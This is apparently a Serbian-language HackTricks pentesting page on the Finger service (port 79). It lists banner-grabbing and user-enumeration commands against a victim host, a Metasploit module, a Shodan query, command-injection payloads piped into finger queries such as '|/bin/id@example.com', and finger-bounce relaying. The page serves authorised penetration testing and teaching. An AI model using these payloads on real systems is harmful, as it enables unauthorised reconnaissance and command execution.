79 - Pentesting Finger

Reading time: 2 minutes

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Podržite HackTricks

Osnovne informacije

Program/usluga Finger se koristi za dobijanje detalja o korisnicima računara. Obično, informacije koje se pružaju uključuju korisničko ime, puno ime, i, u nekim slučajevima, dodatne detalje. Ovi dodatni detalji mogu obuhvatati lokaciju kancelarije i broj telefona (ako su dostupni), vreme kada se korisnik prijavio, period neaktivnosti (idle time), poslednji put kada je korisnik pročitao mail, i sadržaj korisnikovih planova i projektnih fajlova.

Podrazumevani port: 79

PORT   STATE SERVICE
79/tcp open  finger

Enumeracija

Prikupljanje banera/Osnovna konekcija

bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Enumeracija korisnika

bash
finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternativno, možete koristiti finger-user-enum iz pentestmonkey, neki primeri:

bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap izvršava skriptu za korišćenje podrazumevanih skripti

Metasploit koristi više trikova od Nmap-a

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Izvršenje komandi

bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Koristite sistem kao finger relé

finger user@host@victim
finger @internal@external

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Podržite HackTricks